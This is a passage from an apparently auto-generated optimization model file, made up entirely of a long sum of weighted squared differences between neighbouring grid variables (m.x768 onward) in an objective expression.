8.11690209768664*m.x768)**2 + (1.3*m.x769 - 1.3*m.x768)**2) + 2.24343484490943*((8.11690209768664
*m.x796 - 8.11690209768664*m.x769)**2 + (1.3*m.x770 - 1.3*m.x769)**2) + 2.24343484490943*((
8.11690209768664*m.x797 - 8.11690209768664*m.x770)**2 + (1.3*m.x771 - 1.3*m.x770)**2) +
2.24343484490943*((8.11690209768664*m.x798 - 8.11690209768664*m.x771)**2 + (1.3*m.x772 - 1.3*
m.x771)**2) + 2.24343484490943*((8.11690209768664*m.x799 - 8.11690209768664*m.x772)**2 + (1.3*
m.x773 - 1.3*m.x772)**2) + 2.24343484490943*((8.11690209768664*m.x800 - 8.11690209768664*m.x773)
**2 + (1.3*m.x774 - 1.3*m.x773)**2) + 2.24343484490943*((8.11690209768664*m.x801 -
8.11690209768664*m.x774)**2 + (1.3*m.x775 - 1.3*m.x774)**2) + 2.24343484490943*((8.11690209768664
*m.x802 - 8.11690209768664*m.x775)**2 + (1.3*m.x776 - 1.3*m.x775)**2) + 2.24343484490943*((
8.11690209768664*m.x803 - 8.11690209768664*m.x776)**2 + (1.3*m.x777 - 1.3*m.x776)**2) +
2.24343484490943*((8.11690209768664*m.x804 - 8.11690209768664*m.x777)**2 + (1.3*m.x778 - 1.3*
m.x777)**2) + 2.24343484490943*((8.11690209768664*m.x805 - 8.11690209768664*m.x778)**2 + (1.3*
m.x779 - 1.3*m.x778)**2) + 2.24343484490943*((8.11690209768664*m.x806 - 8.11690209768664*m.x779)
**2 + (1.3*m.x780 - 1.3*m.x779)**2) + 2.24343484490943*((8.11690209768664*m.x807 -
8.11690209768664*m.x780)**2 + (1.3*m.x781 - 1.3*m.x780)**2) + 2.24343484490943*((8.11690209768664
*m.x808 - 8.11690209768664*m.x781)**2 + (1.3*m.x782 - 1.3*m.x781)**2) + 2.24343484490943*((
8.11690209768664*m.x809 - 8.11690209768664*m.x782)**2 + (1.3*m.x783 - 1.3*m.x782)**2) +
2.28348260596749*((8.11690209768664*m.x811 - 8.11690209768664*m.x784)**2 + (1.3*m.x785 - 1.3*
m.x784)**2) + 2.28348260596749*((8.11690209768664*m.x812 - 8.11690209768664*m.x785)**2 + (1.3*
m.x786 - 1.3*m.x785)**2) + 2.28348260596749*((8.11690209768664*m.x813 - 8.11690209768664*m.x786)
**2 + (1.3*m.x787 - 1.3*m.x786)**2) + 2.28348260596749*((8.11690209768664*m.x814 -
8.11690209768664*m.x787)**2 + (1.3*m.x788 - 1.3*m.x787)**2) + 2.28348260596749*((8.11690209768664
*m.x815 - 8.11690209768664*m.x788)**2 + (1.3*m.x789 - 1.3*m.x788)**2) + 2.28348260596749*((
8.11690209768664*m.x816 - 8.11690209768664*m.x789)**2 + (1.3*m.x790 - 1.3*m.x789)**2) +
2.28348260596749*((8.11690209768664*m.x817 - 8.11690209768664*m.x790)**2 + (1.3*m.x791 - 1.3*
m.x790)**2) + 2.28348260596749*((8.11690209768664*m.x818 - 8.11690209768664*m.x791)**2 + (1.3*
m.x792 - 1.3*m.x791)**2) + 2.28348260596749*((8.11690209768664*m.x819 - 8.11690209768664*m.x792)
**2 + (1.3*m.x793 - 1.3*m.x792)**2) + 2.28348260596749*((8.11690209768664*m.x820 -
8.11690209768664*m.x793)**2 + (1.3*m.x794 - 1.3*m.x793)**2) + 2.28348260596749*((8.11690209768664
*m.x821 - 8.11690209768664*m.x794)**2 + (1.3*m.x795 - 1.3*m.x794)**2) + 2.28348260596749*((
8.11690209768664*m.x822 - 8.11690209768664*m.x795)**2 + (1.3*m.x796 - 1.3*m.x795)**2) +
2.28348260596749*((8.11690209768664*m.x823 - 8.11690209768664*m.x796)**2 + (1.3*m.x797 - 1.3*
m.x796)**2) + 2.28348260596749*((8.11690209768664*m.x824 - 8.11690209768664*m.x797)**2 + (1.3*
m.x798 - 1.3*m.x797)**2) + 2.28348260596749*((8.11690209768664*m.x825 - 8.11690209768664*m.x798)
**2 + (1.3*m.x799 - 1.3*m.x798)**2) + 2.28348260596749*((8.11690209768664*m.x826 -
8.11690209768664*m.x799)**2 + (1.3*m.x800 - 1.3*m.x799)**2) + 2.28348260596749*((8.11690209768664
*m.x827 - 8.11690209768664*m.x800)**2 + (1.3*m.x801 - 1.3*m.x800)**2) + 2.28348260596749*((
8.11690209768664*m.x828 - 8.11690209768664*m.x801)**2 + (1.3*m.x802 - 1.3*m.x801)**2) +
2.28348260596749*((8.11690209768664*m.x829 - 8.11690209768664*m.x802)**2 + (1.3*m.x803 - 1.3*
m.x802)**2) + 2.28348260596749*((8.11690209768664*m.x830 - 8.11690209768664*m.x803)**2 + (1.3*
m.x804 - 1.3*m.x803)**2) + 2.28348260596749*((8.11690209768664*m.x831 - 8.11690209768664*m.x804)
**2 + (1.3*m.x805 - 1.3*m.x804)**2) + 2.28348260596749*((8.11690209768664*m.x832 -
8.11690209768664*m.x805)**2 + (1.3*m.x806 - 1.3*m.x805)**2) + 2.28348260596749*((8.11690209768664
*m.x833 - 8.11690209768664*m.x806)**2 + (1.3*m.x807 - 1.3*m.x806)**2) + 2.28348260596749*((
8.11690209768664*m.x834 - 8.11690209768664*m.x807)**2 + (1.3*m.x808 - 1.3*m.x807)**2) +
2.28348260596749*((8.11690209768664*m.x835 - 8.11690209768664*m.x808)**2 + (1.3*m.x809 - 1.3*
m.x808)**2) + 2.28348260596749*((8.11690209768664*m.x836 - 8.11690209768664*m.x809)**2 + (1.3*
m.x810 - 1.3*m.x809)**2) + 2.33403023495273*((8.11690209768664*m.x838 - 8.11690209768664*m.x811)
**2 + (1.3*m.x812 - 1.3*m.x811)**2) + 2.33403023495273*((8.11690209768664*m.x839 -
8.11690209768664*m.x812)**2 + (1.3*m.x813 - 1.3*m.x812)**2) + 2.33403023495273*((8.11690209768664
*m.x840 - 8.11690209768664*m.x813)**2 + (1.3*m.x814 - 1.3*m.x813)**2) + 2.33403023495273*((
8.11690209768664*m.x841 - 8.11690209768664*m.x814)**2 + (1.3*m.x815 - 1.3*m.x814)**2) +
2.33403023495273*((8.11690209768664*m.x842 - 8.11690209768664*m.x815)**2 + (1.3*m.x816 - 1.3*
m.x815)**2) + 2.33403023495273*((8.11690209768664*m.x843 - 8.11690209768664*m.x816)**2 + (1.3*
m.x817 - 1.3*m.x816)**2) + 2.33403023495273*((8.11690209768664*m.x844 - 8.11690209768664*m.x817)
**2 + (1.3*m.x818 - 1.3*m.x817)**2) + 2.33403023495273*((8.11690209768664*m.x845 -
8.11690209768664*m.x818)**2 + (1.3*m.x819 - 1.3*m.x818)**2) + 2.33403023495273*((8.11690209768664
*m.x846 - 8.11690209768664*m.x819)**2 + (1.3*m.x820 - 1.3*m.x819)**2) + 2.33403023495273*((
8.11690209768664*m.x847 - 8.11690209768664*m.x820)**2 + (1.3*m.x821 - 1.3*m.x820)**2) +
2.33403023495273*((8.11690209768664*m.x848 - 8.11690209768664*m.x821)**2 + (1.3*m.x822 - 1.3*
m.x821)**2) + 2.33403023495273*((8.11690209768664*m.x849 - 8.11690209768664*m.x822)**2 + (1.3*
m.x823 - 1.3*m.x822)**2) + 2.33403023495273*((8.11690209768664*m.x850 - 8.11690209768664*m.x823)
**2 + (1.3*m.x824 - 1.3*m.x823)**2) + 2.33403023495273*((8.11690209768664*m.x851 -
8.11690209768664*m.x824)**2 + (1.3*m.x825 - 1.3*m.x824)**2) + 2.33403023495273*((8.11690209768664
*m.x852 - 8.11690209768664*m.x825)**2 + (1.3*m.x826 - 1.3*m.x825)**2) + 2.33403023495273*((
8.11690209768664*m.x853 - 8.11690209768664*m.x826)**2 + (1.3*m.x827 - 1.3*m.x826)**2) +
2.33403023495273*((8.11690209768664*m.x854 - 8.11690209768664*m.x827)**2 + (1.3*m.x828 - 1.3*
m.x827)**2) + 2.33403023495273*((8.11690209768664*m.x855 - 8.11690209768664*m.x828)**2 + (1.3*
m.x829 - 1.3*m.x828)**2) + 2.33403023495273*((8.11690209768664*m.x856 - 8.11690209768664*m.x829)
**2 + (1.3*m.x830 - 1.3*m.x829)**2) + 2.33403023495273*((8.11690209768664*m.x857 -
8.11690209768664*m.x830)**2 + (1.3*m.x831 - 1.3*m.x830)**2) + 2.33403023495273*((8.11690209768664
*m.x858 - 8.11690209768664*m.x831)**2 + (1.3*m.x832 - 1.3*m.x831)**2) + 2.33403023495273*((
8.11690209768664*m.x859 - 8.11690209768664*m.x832)**2 + (1.3*m.x833 - 1.3*m.x832)**2) +
2.33403023495273*((8.11690209768664*m.x860 - 8.11690209768664*m.x833)**2 + (1.3*m.x834 - 1.3*
m.x833)**2) + 2.33403023495273*((8.11690209768664*m.x861 - 8.11690209768664*m.x834)**2 + (1.3*
m.x835 - 1.3*m.x834)**2) + 2.33403023495273*((8.11690209768664*m.x862 - 8.11690209768664*m.x835)
**2 + (1.3*m.x836 - 1.3*m.x835)**2) + 2.33403023495273*((8.11690209768664*m.x863 -
8.11690209768664*m.x836)**2 + (1.3*m.x837 - 1.3*m.x836)**2) + 2.39473303225368*((8.11690209768664
*m.x865 - 8.11690209768664*m.x838)**2 + (1.3*m.x839 - 1.3*m.x838)**2) + 2.39473303225368*((
8.11690209768664*m.x866 - 8.11690209768664*m.x839)**2 + (1.3*m.x840 - 1.3*m.x839)**2) +
2.39473303225368*((8.11690209768664*m.x867 - 8.11690209768664*m.x840)**2 + (1.3*m.x841 - 1.3*
m.x840)**2) + 2.39473303225368*((8.11690209768664*m.x868 - 8.11690209768664*m.x841)**2 + (1.3*
m.x842 - 1.3*m.x841)**2) + 2.39473303225368*((8.11690209768664*m.x869 - 8.11690209768664*m.x842)
**2 + (1.3*m.x843 - 1.3*m.x842)**2) + 2.39473303225368*((8.11690209768664*m.x870 -
8.11690209768664*m.x843)**2 + (1.3*m.x844 - 1.3*m.x843)**2) + 2.39473303225368*((8.11690209768664
*m.x871 - 8.11690209768664*m.x844)**2 + (1.3*m.x845 - 1.3*m.x844)**2) + 2.39473303225368*((
8.11690209768664*m.x872 - 8.11690209768664*m.x845)**2 + (1.3*m.x846 - 1.3*m.x845)**2) +
2.39473303225368*((8.11690209768664*m.x873 - 8.11690209768664*m.x846)**2 + (1.3*m.x847 - 1.3*
m.x846)**2) + 2.39473303225368*((8.11690209768664*m.x874 - 8.11690209768664*m.x847)**2 + (1.3*
m.x848 - 1.3*m.x847)**2) + 2.39473303225368*((8.11690209768664*m.x875 - 8.11690209768664*m.x848)
**2 + (1.3*m.x849 - 1.3*m.x848)**2) + 2.39473303225368*((8.11690209768664*m.x876 -
8.11690209768664*m.x849)**2 + (1.3*m.x850 - 1.3*m.x849)**2) + 2.39473303225368*((8.11690209768664
*m.x877 - 8.11690209768664*m.x850)**2 + (1.3*m.x851 - 1.3*m.x850)**2) + 2.39473303225368*((
8.11690209768664*m.x878 - 8.11690209768664*m.x851)**2 + (1.3*m.x852 - 1.3*m.x851)**2) +
2.39473303225368*((8.11690209768664*m.x879 - 8.11690209768664*m.x852)**2 + (1.3*m.x853 - 1.3*
m.x852)**2) + 2.39473303225368*((8.11690209768664*m.x880 - 8.11690209768664*m.x853)**2 + (1.3*
m.x854 - 1.3*m.x853)**2) + 2.39473303225368*((8.11690209768664*m.x881 - 8.11690209768664*m.x854)
**2 + (1.3*m.x855 - 1.3*m.x854)**2) + 2.39473303225368*((8.11690209768664*m.x882 -
8.11690209768664*m.x855)**2 + (1.3*m.x856 - 1.3*m.x855)**2) + 2.39473303225368*((8.11690209768664
*m.x883 - 8.11690209768664*m.x856)**2 + (1.3*m.x857 - 1.3*m.x856)**2) + 2.39473303225368*((
8.11690209768664*m.x884 - 8.11690209768664*m.x857)**2 + (1.3*m.x858 - 1.3*m.x857)**2) +
2.39473303225368*((8.11690209768664*m.x885 - 8.11690209768664*m.x858)**2 + (1.3*m.x859 - 1.3*
m.x858)**2) + 2.39473303225368*((8.11690209768664*m.x886 - 8.11690209768664*m.x859)**2 + (1.3*
m.x860 - 1.3*m.x859)**2) + 2.39473303225368*((8.11690209768664*m.x887 - 8.11690209768664*m.x860)
**2 + (1.3*m.x861 - 1.3*m.x860)**2) + 2.39473303225368*((8.11690209768664*m.x888 -
8.11690209768664*m.x861)**2 + (1.3*m.x862 - 1.3*m.x861)**2) + 2.39473303225368*((8.11690209768664
*m.x889 - 8.11690209768664*m.x862)**2 + (1.3*m.x863 - 1.3*m.x862)**2) + 2.39473303225368*((
8.11690209768664*m.x890 - 8.11690209768664*m.x863)**2 + (1.3*m.x864 - 1.3*m.x863)**2) +
2.46513215473303*((8.11690209768664*m.x892 - 8.11690209768664*m.x865)**2 + (1.3*m.x866 - 1.3*
m.x865)**2) + 2.46513215473303*((8.11690209768664*m.x893 - 8.11690209768664*m.x866)**2 + (1.3*
m.x867 - 1.3*m.x866)**2) + 2.46513215473303*((8.11690209768664*m.x894 - 8.11690209768664*m.x867)
**2 + (1.3*m.x868 - 1.3*m.x867)**2) + 2.46513215473303*((8.11690209768664*m.x895 -
8.11690209768664*m.x868)**2 + (1.3*m.x869 - 1.3*m.x868)**2) + 2.46513215473303*((8.11690209768664
*m.x896 - 8.11690209768664*m.x869)**2 + (1.3*m.x870 - 1.3*m.x869)**2) + 2.46513215473303*((
8.11690209768664*m.x897 - 8.11690209768664*m.x870)**2 + (1.3*m.x871 - 1.3*m.x870)**2) +
2.46513215473303*((8.11690209768664*m.x898 - 8.11690209768664*m.x871)**2 + (1.3*m.x872 - 1.3*
m.x871)**2) + 2.46513215473303*((8.11690209768664*m.x899 - 8.11690209768664*m.x872)**2 + (1.3*
m.x873 - 1.3*m.x872)**2) + 2.46513215473303*((8.11690209768664*m.x900 - 8.11690209768664*m.x873)
**2 + (1.3*m.x874 - 1.3*m.x873)**2) + 2.46513215473303*((8.11690209768664*m.x901 -
8.11690209768664*m.x874)**2 + (1.3*m.x875 - 1.3*m.x874)**2) + 2.46513215473303*((8.11690209768664
*m.x902 - 8.11690209768664*m.x875)**2 + (1.3*m.x876 - 1.3*m.x875)**2) + 2.46513215473303*((
8.11690209768664*m.x903 - 8.11690209768664*m.x876)**2 + (1.3*m.x877 - 1.3*m.x876)**2) +
2.46513215473303*((8.11690209768664*m.x904 - 8.11690209768664*m.x877)**2 + (1.3*m.x878 - 1.3*
m.x877)**2) + 2.46513215473303*((8.11690209768664*m.x905 - 8.11690209768664*m.x878)**2 + (1.3*
m.x879 - 1.3*m.x878)**2) + 2.46513215473303*((8.11690209768664*m.x906 - 8.11690209768664*m.x879)
**2 + (1.3*m.x880 - 1.3*m.x879)**2) + 2.46513215473303*((8.11690209768664*m.x907 -
8.11690209768664*m.x880)**2 + (1.3*m.x881 - 1.3*m.x880)**2) + 2.46513215473303*((8.11690209768664
*m.x908 - 8.11690209768664*m.x881)**2 + (1.3*m.x882 - 1.3*m.x881)**2) + 2.46513215473303*((
8.11690209768664*m.x909 - 8.11690209768664*m.x882)**2 + (1.3*m.x883 - 1.3*m.x882)**2) +
2.46513215473303*((8.11690209768664*m.x910 - 8.11690209768664*m.x883)**2 + (1.3*m.x884 - 1.3*
m.x883)**2) + 2.46513215473303*((8.11690209768664*m.x911 - 8.11690209768664*m.x884)**2 + (1.3*
m.x885 - 1.3*m.x884)**2) + 2.46513215473303*((8.11690209768664*m.x912 - 8.11690209768664*m.x885)
**2 + (1.3*m.x886 - 1.3*m.x885)**2) + 2.46513215473303*((8.11690209768664*m.x913 -
8.11690209768664*m.x886)**2 + (1.3*m.x887 - 1.3*m.x886)**2) + 2.46513215473303*((8.11690209768664
*m.x914 - 8.11690209768664*m.x887)**2 + (1.3*m.x888 - 1.3*m.x887)**2) + 2.46513215473303*((
8.11690209768664*m.x915 - 8.11690209768664*m.x888)**2 + (1.3*m.x889 - 1.3*m.x888)**2) +
2.46513215473303*((8.11690209768664*m.x916 - 8.11690209768664*m.x889)**2 + (1.3*m.x890 - 1.3*
m.x889)**2) + 2.46513215473303*((8.11690209768664*m.x917 - 8.11690209768664*m.x890)**2 + (1.3*
m.x891 - 1.3*m.x890)**2) + 2.54463580631522*((8.11690209768664*m.x919 - 8.11690209768664*m.x892)
**2 + (1.3*m.x893 - 1.3*m.x892)**2) + 2.54463580631522*((8.11690209768664*m.x920 -
8.11690209768664*m.x893)**2 + (1.3*m.x894 - 1.3*m.x893)**2) + 2.54463580631522*((8.11690209768664
*m.x921 - 8.11690209768664*m.x894)**2 + (1.3*m.x895 - 1.3*m.x894)**2) + 2.54463580631522*((
8.11690209768664*m.x922 - 8.11690209768664*m.x895)**2 + (1.3*m.x896 - 1.3*m.x895)**2) +
2.54463580631522*((8.11690209768664*m.x923 - 8.11690209768664*m.x896)**2 + (1.3*m.x897 - 1.3*
m.x896)**2) + 2.54463580631522*((8.11690209768664*m.x924 - 8.11690209768664*m.x897)**2 + (1.3*
m.x898 - 1.3*m.x897)**2) + 2.54463580631522*((8.11690209768664*m.x925 - 8.11690209768664*m.x898)
**2 + (1.3*m.x899 - 1.3*m.x898)**2) + 2.54463580631522*((8.11690209768664*m.x926 -
8.11690209768664*m.x899)**2 + (1.3*m.x900 - 1.3*m.x899)**2) + 2.54463580631522*((8.11690209768664
*m.x927 - 8.11690209768664*m.x900)**2 + (1.3*m.x901 - 1.3*m.x900)**2) + 2.54463580631522*((
8.11690209768664*m.x928 - 8.11690209768664*m.x901)**2 + (1.3*m.x902 - 1.3*m.x901)**2) +
2.54463580631522*((8.11690209768664*m.x929 - 8.11690209768664*m.x902)**2 + (1.3*m.x903 - 1.3*
m.x902)**2) + 2.54463580631522*((8.11690209768664*m.x930 - 8.11690209768664*m.x903)**2 + (1.3*
m.x904 - 1.3*m.x903)**2) + 2.54463580631522*((8.11690209768664*m.x931 - 8.11690209768664*m.x904)
**2 + (1.3*m.x905 - 1.3*m.x904)**2) + 2.54463580631522*((8.11690209768664*m.x932 -
8.11690209768664*m.x905)**2 + (1.3*m.x906 - 1.3*m.x905)**2) + 2.54463580631522*((8.11690209768664
*m.x933 - 8.11690209768664*m.x906)**2 + (1.3*m.x907 - 1.3*m.x906)**2) + 2.54463580631522*((
8.11690209768664*m.x934 - 8.11690209768664*m.x907)**2 + (1.3*m.x908 - 1.3*m.x907)**2) +
2.54463580631522*((8.11690209768664*m.x935 - 8.11690209768664*m.x908)**2 + (1.3*m.x909 - 1.3*
m.x908)**2) + 2.54463580631522*((8.11690209768664*m.x936 - 8.11690209768664*m.x909)**2 + (1.3*
m.x910 - 1.3*m.x909)**2) + 2.54463580631522*((8.11690209768664*m.x937 - 8.11690209768664*m.x910)
**2 + (1.3*m.x911 - 1.3*m.x910)**2) + 2.54463580631522*((8.11690209768664*m.x938 -
8.11690209768664*m.x911)**2 + (1.3*m.x912 - 1.3*m.x911)**2) + 2.54463580631522*((8.11690209768664
*m.x939 - 8.11690209768664*m.x912)**2 + (1.3*m.x913 - 1.3*m.x912)**2) + 2.54463580631522*((
8.11690209768664*m.x940 - 8.11690209768664*m.x913)**2 + (1.3*m.x914 - 1.3*m.x913)**2) +
2.54463580631522*((8.11690209768664*m.x941 - 8.11690209768664*m.x914)**2 + (1.3*m.x915 - 1.3*
m.x914)**2) + 2.54463580631522*((8.11690209768664*m.x942 - 8.11690209768664*m.x915)**2 + (1.3*
m.x916 - 1.3*m.x915)**2) + 2.54463580631522*((8.11690209768664*m.x943 - 8.11690209768664*m.x916)
**2 + (1.3*m.x917 - 1.3*m.x916)**2) + 2.54463580631522*((8.11690209768664*m.x944 -
8.11690209768664*m.x917)**2 + (1.3*m.x918 - 1.3*m.x917)**2) + 2.63250101495027*((8.11690209768664
*m.x946 - 8.11690209768664*m.x919)**2 + (1.3*m.x920 - 1.3*m.x919)**2) + 2.63250101495027*((
8.11690209768664*m.x947 - 8.11690209768664*m.x920)**2 + (1.3*m.x921 - 1.3*m.x920)**2) +
2.63250101495027*((8.11690209768664*m.x948 - 8.11690209768664*m.x921)**2 + (1.3*m.x922 - 1.3*
m.x921)**2) + 2.63250101495027*((8.11690209768664*m.x949 - 8.11690209768664*m.x922)**2 + (1.3*
m.x923 - 1.3*m.x922)**2) + 2.63250101495027*((8.11690209768664*m.x950 - 8.11690209768664*m.x923)
**2 + (1.3*m.x924 - 1.3*m.x923)**2) + 2.63250101495027*((8.11690209768664*m.x951 -
8.11690209768664*m.x924)**2 + (1.3*m.x925 - 1.3*m.x924)**2) + 2.63250101495027*((8.11690209768664
*m.x952 - 8.11690209768664*m.x925)**2 + (1.3*m.x926 - 1.3*m.x925)**2) + 2.63250101495027*((
8.11690209768664*m.x953 - 8.11690209768664*m.x926)**2 + (1.3*m.x927 - 1.3*m.x926)**2) +
2.63250101495027*((8.11690209768664*m.x954 - 8.11690209768664*m.x927)**2 + (1.3*m.x928 - 1.3*
m.x927)**2) + 2.63250101495027*((8.11690209768664*m.x955 - 8.11690209768664*m.x928)**2 + (1.3*
m.x929 - 1.3*m.x928)**2) + 2.63250101495027*((8.11690209768664*m.x956 - 8.11690209768664*m.x929)
**2 + (1.3*m.x930 - 1.3*m.x929)**2) + 2.63250101495027*((8.11690209768664*m.x957 -
8.11690209768664*m.x930)**2 + (1.3*m.x931 - 1.3*m.x930)**2) + 2.63250101495027*((8.11690209768664
*m.x958 - 8.11690209768664*m.x931)**2 + (1.3*m.x932 - 1.3*m.x931)**2) + 2.63250101495027*((
8.11690209768664*m.x959 - 8.11690209768664*m.x932)**2 + (1.3*m.x933 - 1.3*m.x932)**2) +
2.63250101495027*((8.11690209768664*m.x960 - 8.11690209768664*m.x933)**2 + (1.3*m.x934 - 1.3*
m.x933)**2) + 2.63250101495027*((8.11690209768664*m.x961 - 8.11690209768664*m.x934)**2 + (1.3*
m.x935 - 1.3*m.x934)**2) + 2.63250101495027*((8.11690209768664*m.x962 - 8.11690209768664*m.x935)
**2 + (1.3*m.x936 - 1.3*m.x935)**2) + 2.63250101495027*((8.11690209768664*m.x963 -
8.11690209768664*m.x936)**2 + (1.3*m.x937 - 1.3*m.x936)**2) + 2.63250101495027*((8.11690209768664
*m.x964 - 8.11690209768664*m.x937)**2 + (1.3*m.x938 - 1.3*m.x937)**2) + 2.63250101495027*((
8.11690209768664*m.x965 - 8.11690209768664*m.x938)**2 + (1.3*m.x939 - 1.3*m.x938)**2) +
2.63250101495027*((8.11690209768664*m.x966 - 8.11690209768664*m.x939)**2 + (1.3*m.x940 - 1.3*
m.x939)**2) + 2.63250101495027*((8.11690209768664*m.x967 - 8.11690209768664*m.x940)**2 + (1.3*
m.x941 - 1.3*m.x940)**2) + 2.63250101495027*((8.11690209768664*m.x968 - 8.11690209768664*m.x941)
**2 + (1.3*m.x942 - 1.3*m.x941)**2) + 2.63250101495027*((8.11690209768664*m.x969 -
8.11690209768664*m.x942)**2 + (1.3*m.x943 - 1.3*m.x942)**2) + 2.63250101495027*((8.11690209768664
*m.x970 - 8.11690209768664*m.x943)**2 + (1.3*m.x944 - 1.3*m.x943)**2) + 2.63250101495027*((
8.11690209768664*m.x971 - 8.11690209768664*m.x944)**2 + (1.3*m.x945 - 1.3*m.x944)**2) +
2.72781770933351*((8.11690209768664*m.x973 - 8.11690209768664*m.x946)**2 + (1.3*m.x947 - 1.3*
m.x946)**2) + 2.72781770933351*((8.11690209768664*m.x974 - 8.11690209768664*m.x947)**2 + (1.3*
m.x948 - 1.3*m.x947)**2) + 2.72781770933351*((8.11690209768664*m.x975 - 8.11690209768664*m.x948)
**2 + (1.3*m.x949 - 1.3*m.x948)**2) + 2.72781770933351*((8.11690209768664*m.x976 -
8.11690209768664*m.x949)**2 + (1.3*m.x950 - 1.3*m.x949)**2) + 2.72781770933351*((8.11690209768664
*m.x977 - 8.11690209768664*m.x950)**2 + (1.3*m.x951 - 1.3*m.x950)**2) + 2.72781770933351*((
8.11690209768664*m.x978 - 8.11690209768664*m.x951)**2 + (1.3*m.x952 - 1.3*m.x951)**2) +
2.72781770933351*((8.11690209768664*m.x979 - 8.11690209768664*m.x952)**2 + (1.3*m.x953 - 1.3*
m.x952)**2) + 2.72781770933351*((8.11690209768664*m.x980 - 8.11690209768664*m.x953)**2 + (1.3*
m.x954 - 1.3*m.x953)**2) + 2.72781770933351*((8.11690209768664*m.x981 - 8.11690209768664*m.x954)
**2 + (1.3*m.x955 - 1.3*m.x954)**2) + 2.72781770933351*((8.11690209768664*m.x982 -
8.11690209768664*m.x955)**2 + (1.3*m.x956 - 1.3*m.x955)**2) + 2.72781770933351*((8.11690209768664
*m.x983 - 8.11690209768664*m.x956)**2 + (1.3*m.x957 - 1.3*m.x956)**2) + 2.72781770933351*((
8.11690209768664*m.x984 - 8.11690209768664*m.x957)**2 + (1.3*m.x958 - 1.3*m.x957)**2) +
2.72781770933351*((8.11690209768664*m.x985 - 8.11690209768664*m.x958)**2 + (1.3*m.x959 - 1.3*
m.x958)**2) + 2.72781770933351*((8.11690209768664*m.x986 - 8.11690209768664*m.x959)**2 + (1.3*
m.x960 - 1.3*m.x959)**2) + 2.72781770933351*((8.11690209768664*m.x987 - 8.11690209768664*m.x960)
**2 + (1.3*m.x961 - 1.3*m.x960)**2) + 2.72781770933351*((8.11690209768664*m.x988 -
8.11690209768664*m.x961)**2 + (1.3*m.x962 - 1.3*m.x961)**2) + 2.72781770933351*((8.11690209768664
*m.x989 - 8.11690209768664*m.x962)**2 + (1.3*m.x963 - 1.3*m.x962)**2) + 2.72781770933351*((
8.11690209768664*m.x990 - 8.11690209768664*m.x963)**2 + (1.3*m.x964 - 1.3*m.x963)**2) +
2.72781770933351*((8.11690209768664*m.x991 - 8.11690209768664*m.x964)**2 + (1.3*m.x965 - 1.3*
m.x964)**2) + 2.72781770933351*((8.11690209768664*m.x992 - 8.11690209768664*m.x965)**2 + (1.3*
m.x966 - 1.3*m.x965)**2) + 2.72781770933351*((8.11690209768664*m.x993 - 8.11690209768664*m.x966)
**2 + (1.3*m.x967 - 1.3*m.x966)**2) + 2.72781770933351*((8.11690209768664*m.x994 -
8.11690209768664*m.x967)**2 + (1.3*m.x968 - 1.3*m.x967)**2) + 2.72781770933351*((8.11690209768664
*m.x995 - 8.11690209768664*m.x968)**2 + (1.3*m.x969 - 1.3*m.x968)**2) + 2.72781770933351*((
8.11690209768664*m.x996 - 8.11690209768664*m.x969)**2 + (1.3*m.x970 - 1.3*m.x969)**2) +
2.72781770933351*((8.11690209768664*m.x997 - 8.11690209768664*m.x970)**2 + (1.3*m.x971 - 1.3*
m.x970)**2) + 2.72781770933351*((8.11690209768664*m.x998 - 8.11690209768664*m.x971)**2 + (1.3*
m.x972 - 1.3*m.x971)**2) + 2.82949687968474*((8.11690209768664*m.x1000 - 8.11690209768664*m.x973)
**2 + (1.3*m.x974 - 1.3*m.x973)**2) + 2.82949687968474*((8.11690209768664*m.x1001 -
8.11690209768664*m.x974)**2 + (1.3*m.x975 - 1.3*m.x974)**2) + 2.82949687968474*((8.11690209768664
*m.x1002 - 8.11690209768664*m.x975)**2 + (1.3*m.x976 - 1.3*m.x975)**2) + 2.82949687968474*((
8.11690209768664*m.x1003 - 8.11690209768664*m.x976)**2 + (1.3*m.x977 - 1.3*m.x976)**2) +
2.82949687968474*((8.11690209768664*m.x1004 - 8.11690209768664*m.x977)**2 + (1.3*m.x978 - 1.3*
m.x977)**2) + 2.82949687968474*((8.11690209768664*m.x1005 - 8.11690209768664*m.x978)**2 + (1.3*
m.x979 - 1.3*m.x978)**2) + 2.82949687968474*((8.11690209768664*m.x1006 - 8.11690209768664*m.x979)
**2 + (1.3*m.x980 - 1.3*m.x979)**2) + 2.82949687968474*((8.11690209768664*m.x1007 -
8.11690209768664*m.x980)**2 + (1.3*m.x981 - 1.3*m.x980)**2) + 2.82949687968474*((8.11690209768664
*m.x1008 - 8.11690209768664*m.x981)**2 + (1.3*m.x982 - 1.3*m.x981)**2) + 2.82949687968474*((
8.11690209768664*m.x1009 - 8.11690209768664*m.x982)**2 + (1.3*m.x983 - 1.3*m.x982)**2) +
2.82949687968474*((8.11690209768664*m.x1010 - 8.11690209768664*m.x983)**2 + (1.3*m.x984 - 1.3*
m.x983)**2) + 2.82949687968474*((8.11690209768664*m.x1011 - 8.11690209768664*m.x984)**2 + (1.3*
m.x985 - 1.3*m.x984)**2) + 2.82949687968474*((8.11690209768664*m.x1012 - 8.11690209768664*m.x985)
**2 + (1.3*m.x986 - 1.3*m.x985)**2) + 2.82949687968474*((8.11690209768664*m.x1013 -
8.11690209768664*m.x986)**2 + (1.3*m.x987 - 1.3*m.x986)**2) + 2.82949687968474*((8.11690209768664
*m.x1014 - 8.11690209768664*m.x987)**2 + (1.3*m.x988 - 1.3*m.x987)**2) + 2.82949687968474*((
8.11690209768664*m.x1015 - 8.11690209768664*m.x988)**2 + (1.3*m.x989 - 1.3*m.x988)**2) +
2.82949687968474*((8.11690209768664*m.x1016 - 8.11690209768664*m.x989)**2 + (1.3*m.x990 - 1.3*
m.x989)**2) + 2.82949687968474*((8.11690209768664*m.x1017 - 8.11690209768664*m.x990)**2 + (1.3*
m.x991 - 1.3*m.x990)**2) + 2.82949687968474*((8.11690209768664*m.x1018 - 8.11690209768664*m.x991)
**2 + (1.3*m.x992 - 1.3*m.x991)**2) + 2.82949687968474*((8.11690209768664*m.x1019 -
8.11690209768664*m.x992)**2 + (1.3*m.x993 - 1.3*m.x992)**2) + 2.82949687968474*((8.11690209768664
*m.x1020 - 8.11690209768664*m.x993)**2 + (1.3*m.x994 - 1.3*m.x993)**2) + 2.82949687968474*((
8.11690209768664*m.x1021 - 8.11690209768664*m.x994)**2 + (1.3*m.x995 - 1.3*m.x994)**2) +
2.82949687968474*((8.11690209768664*m.x1022 - 8.11690209768664*m.x995)**2 + (1.3*m.x996 - 1.3*
m.x995)**2) + 2.82949687968474*((8.11690209768664*m.x1023 - 8.11690209768664*m.x996)**2 + (1.3*
